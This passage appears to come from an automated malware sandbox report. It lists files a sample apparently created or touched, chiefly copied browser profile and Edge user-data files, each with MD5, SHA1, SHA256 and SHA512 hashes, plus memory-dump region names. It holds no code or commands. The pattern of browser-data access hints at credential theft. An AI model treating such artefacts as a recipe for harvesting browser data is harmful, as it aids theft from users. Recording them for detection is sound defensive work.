SHA1 a9d1b7c50ef40c2fdb0a1e3204247817ae859c08
SHA256 375a74de5452d2a16e17d1161eb77e0a54f1eaa80034e6e22f1084fcb9c5ba35
SHA512 257d16f8d1153febaa500e4ee925544120101e5d3195aa77637448471e0a55560b145e8130ab420ddd289f5999a1663eec306da82b50b136a20f29906dd009dd

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Default\Secure Preferences

MD5 690e4734f36455efed45f290c601ba8e
SHA1 61ce2aa71030a9c535a9b46f9d2b9528fed8499f
SHA256 0b1d90df3655b4a4740524f4b54160cba1c51a4b3493c0f6c4cc99a4f60a0c1d
SHA512 0dfffe9aa8af4cfa36ea31a38e9bda22ff0213ae72117e1105d6b0f8ec636326ec26d2270d5cf867da71dc982f55392c0bdaa9547a9235631b18de657b7ff193

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Local State

MD5 d5652d56b05fc8907a2b9ff01beeae3a
SHA1 2fae477ce2bb2feb34c4268dc4a4e2f883564648
SHA256 789b444cb26ab91713c3de457aa2b82a1d4a7cba507ff33e15e44b1244d60646
SHA512 eb45bf96d1de9eed7240e0fed201f7865dd8f13430b671be73533267ba9155922653844b6625ce94ce2fffa2bbbaff85d98f2840f649379c35d5c20c23333cb1

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Default\Preferences

MD5 d81d39cc964f7e6dbfaa9672366f8807
SHA1 409266ddb5f2d3fb830d826690ee136d43f5cbe2
SHA256 b2cd84b298e97d072a4e5775939813e52f63a603b431bbda480897c49ad08129
SHA512 1955d4116751b8b0530a571205233c7b2e17589f5f69fb82c071a42cb8a68569ee61340ca8c58cd137a49ec438c4cf9b0fdb07fde74a3493d06f10e995089239

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 83f797e9c2ca05889243be5052831fbf
SHA1 3d00d30cbf17da9ce4f50151580aa4cd7dbfaac6
SHA256 859219b4fc3740306148e230da07c54e9ca6a7cfa4e02a5538a1bab88f508b44
SHA512 353ca6991cd2b682daf48fbe6cbd9858bad3f16deb9f511fc29c4d47e115ed6bd1d9c11d5110938b4bba4b5a2f5fa1acdebed47a0f17285808b7898c13c86b6e

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Default\Network\05027daf-4ef1-4687-b6d8-add8ba0f4088.tmp

MD5 e745edaa93a6a74aa0b6ae5cf7ce75fa
SHA1 3e5040e28c9d70c4c74a89b2011ab420f151ef5e
SHA256 76a561d384df2c866e80c2e3c456491067e6149ce0da051016a01bd03241d9a0
SHA512 20a1f4b6b4e84a462e4c25d91fc32a94f297165495388594b8c0776a379ff9e912a8f1f9beaba6a573d7cd74e18f11c9a12c0564b419519effdcfad902f14f43

C:\Users\Admin\AppData\Local\Temp\d.jfm

MD5 319334844efeadd46a9a6cb364314c7f
SHA1 2f19255d4d5791d92948cde8118632b3a3f764c6
SHA256 2e46b49427c152b9bcc28de9918c7f294242b34077a79b09076ffdbbf836b6aa
SHA512 5d7b156f7d2f3cfbe6176360abcd3e0608351a0f7d5469bf85f5d20081cd4f8fb64736e7afd69f329f585396e278d3aecb138e57286ea6807dd71238879f2c54

C:\Users\Admin\AppData\Local\Temp\d.jfm

MD5 29b2e3e86995ac332d1f39539c349c8b
SHA1 240d92678e13775250c332f2b92db23d605480fb
SHA256 f3ad0cd79ac14f13e5fed8920699fccac7c982af0cda166140d16fcf82ce305f
SHA512 75ed4e6832f98db17027098813afbc49db013e6d43a4c4e8a3ec7150c4f4d49d0f69d10997bca58d0ec783512306c3da7b11a879212b77683347b04512ba87fc

C:\Users\Admin\AppData\Local\Temp\d

MD5 a66c45636874acdcbe3712f478e4e628
SHA1 9a359cbb675e0e20216b2a93bb973ecad940f109
SHA256 108d7d5e06c3fdd33120a223a26b2ebef205f3ca7d1a880fb3a3fe89a5d3cf1b
SHA512 ddb06658e2658df57ecd187e4b52fc772ac1a509b765617e88bd66255445a62bf8e5289a9023d3f4b273949b5c37cb4d36aa3e81f9b421aa70fc5df4e9711eb2

memory/1348-1764-0x0000000000400000-0x0000000000580000-memory.dmp

memory/2280-1967-0x0000000008690000-0x00000000086FA000-memory.dmp

memory/2280-1968-0x00000000087A0000-0x000000000883C000-memory.dmp

memory/5780-1971-0x0000000000400000-0x000000000042A000-memory.dmp

memory/5780-1972-0x0000000004F30000-0x0000000004FA6000-memory.dmp

memory/5780-1974-0x0000000004F10000-0x0000000004F2E000-memory.dmp

memory/5780-1976-0x0000000005610000-0x0000000005C28000-memory.dmp

memory/5780-1977-0x00000000050A0000-0x00000000050B2000-memory.dmp

memory/5780-1979-0x0000000005100000-0x000000000513C000-memory.dmp

memory/5780-1982-0x0000000005140000-0x000000000518C000-memory.dmp

memory/5780-1990-0x00000000053A0000-0x00000000054AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Default\Preferences

MD5 a449e112c0cc3a4f032e17397278946c
SHA1 c658c78d24c41a2defb76cf248bf48eb3cb370f6
SHA256 2627942cb36a4909270cc71a53826bf3764969f6d5bac1aa9fdcdd18c891207f
SHA512 93da2d9dc7ba09b5b888056dc80c45108a327377f42cb0a2b2568213eda6cc5eeca9bf6d76e9c12dfea5c03a0453894bbdfe9593beb5e26db063a2c12350c2cb

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Default\Network\TransportSecurity

MD5 380a739dbe8a1acf09f1ea9707a60d3f
SHA1 cf30fbbb837d97e4ac888fa21dae61d2e9efafdc
SHA256 746b01ca96120f0d3b24beece365d70c3aae1136de917ed5933ecc01fff03cda
SHA512 e3205478ea3e3f58b91136834f9d2ec28f6ac55de8c7c78a783919435a67523090bf7cb9ff86a50f405956bbf061dc05ccfa971310d8d59d0256391a9ab795c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 381271d9897f516c50ca9c748bec4b81
SHA1 90dbb3b4114b4511aa3acd5467e3a90aac4f2182
SHA256 901d07989bbdd5c9322616a876399a5dea7eb20fb8fe52fd23cde7d61bcd8aae
SHA512 10e9f8c8cbdcdcc9efb63f6a6dc9687feda07e8e57a145297a0875e895fb52a5d40a1d24eb4942abd4a760714acb4d2c7ccf7a6eb40867e8086ff269d73c2ae0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe583718.TMP

MD5 00ee1a706d9f419220d92e62cdb27982
SHA1 967c5b22589365e4a1f863534293592fc0fff7c8
SHA256 1b934030d0b9402ccfe039097a56b5601e929701aec37399c68d652654bff31c
SHA512 5a6359f00f91509af5b10cbc2c59395eb246ceda1609c8f5f9b820674588a3fed7d003d4bcb09e4b6a4d32f1a7ffa5dceb6aa03f7f6e0be7af6f6fba833b9e97

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Default\Preferences

MD5 79e181028fe044356b10ec48be8e74fb
SHA1 244f61fb2ac1a05d406ed051f52a9a30232cb363
SHA256 45f16085a1048bd48f13803980e9795b49cf880c0c409ee411adb31e608f7e17
SHA512 ea86be06354c6a96839902991ec4ec0e2052c516a5652d0f7626c1594b2e67778becac879145781090fd356f6680b0c59ac9e6f875bd50a960ac9ab0cf9a6f6d

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Local State

MD5 e32a3cd0dcfcd5061b162be567cdc738
SHA1 a0cb73344215a8006eddf76c24bf6c259d3a4710
SHA256 604d2d9d1d825dddffb92500c0ca809e05444191805f5de78aabc26ddd7762ed
SHA512 d6d18dc6fd9be84e63e61ea9783c4a629beb8951a35b9fdd365728be3fec896a1a0a9e0b396f8e747cb5b930e381dbf4ae2e284a5d8f00476c7f4520ea1edbb0

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Default\Code Cache\js\index-dir\the-real-index~RFe58580e.TMP

MD5 245ff8f7d397ad6241ae89e8dc6849c9
SHA1 367c1aa1a35231e0f9ee2f49a025329c5fbbb718
SHA256 54103d84abe05c615809bab38c559283514c663c570b1a89c5155971e4ab9921
SHA512 4cf878a402e4785301eb82747ae7acc5e8dccad113697a09fd1e6d7e468fdc8519db53262d6c3e80f2a65952e2c1a9ce2701ac78aa7ae157f7d0198cc506cb34

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Default\Code Cache\js\index-dir\the-real-index

MD5 8c21ae3d67b75e7f6359286b2382832d
SHA1 9002daf98b7efd28026b7657a811fda226d9b883
SHA256 3c3b7543c6151568af5a54e6028a9caeceab031665fc04aeb64db51b8af4e446
SHA512 b731eea788b38316eaac1c52f385b285e1a28ad3ed909e066e680cfb8cb33b216d26565abe4a7a96a0a72ed853e1c983cd53686a519b11487256e69350588d3c

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Default\Preferences

MD5 7833997738f7ba05c504ab32aba09ee5
SHA1 363f900630f37e4c9f28212b713ad36850ec4f62
SHA256 e6d53b4c931d0e4a83a4283b6364f2234b66edd57d044d0c55711cb3eb408a13
SHA512 f86cf99b69b5132bb175880c5feb9dbe377bf97b6d88f1e9ed8ea3c7c531edbbf5e751abb8c1adf49fd8a9d3b192b570be465a29e55a455f9ad83ec47c5c7dfd

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Default\Network\TransportSecurity

MD5 d8263be5196b1d35111a596a0a5376c6
SHA1 145b4364987f45820c2fad94dace6ba613e0df66
SHA256 1b30aaceb67b7cd17eaa21ffec0b9bf2821b523ef578e8d2ca6be70df3db70e2
SHA512 32a00c167ccd7290d6b5d646f760d7f017f8bfc2b801d543c33a9ece588b77da9726bdebe773f3ae9463d98b77e0754e251a8b3d8d1bc5ffc5025ad706572e75

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4bc8a3540a546cfe044e0ed1a0a22a95
SHA1 5387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256 f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512 e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Default\Network\Network Persistent State

MD5 fac05d189a414472989676c934c9f655
SHA1 c9818ce6f1ea66d1eda223e7d39ff955b985392c
SHA256 1797f5da866ba53ad8e3ae803e7938f7ba9a8084cf6f36de675e48aabe8ea920
SHA512 6a14da511ce71925fba56c56ea5324795c1a448fbb2e84cdcd96609455f140d6b3ce231e526facb9166a7d16a35bfb95d5540ed6399434d16d175fdf33d3f48b

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Default\Network\TransportSecurity

MD5 0371ba8b164db9469e2afad099280133
SHA1 1797488d4a6a0060b32324d285fdf2bc39be17cc
SHA256 7738cf01aa025f3ab7abaae1a8a1f7abe1c9249cfb5513cd1b60d851c05c6ab2
SHA512 e751c44e584ac785b6292b450e16d31e5f6ef1a1f12091c3d7ffd73ca717b53bfbc031baf365d59e17d5c12f9df44c747ad800b523a1aa9039a1768094bade1f

C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Default\Preferences

MD5 0504c71bd0f2736f3a0f6df4f76ab5ee
SHA1 ae4ff0639fde808f55e783817106ef2cc39bf569
SHA256 94a8350c22bb594271fce7f3027123c1d5963705e87e1ba21e757a1dba60dd75
SHA512 d532cdbbffe2c6921d5fadfc0c37ff59cb1f69b3e432dc13813939f73428c7a1a2ceebdc4bad9037e390e548a34602f5ab917ce5aa505dc14b9208d9938f2077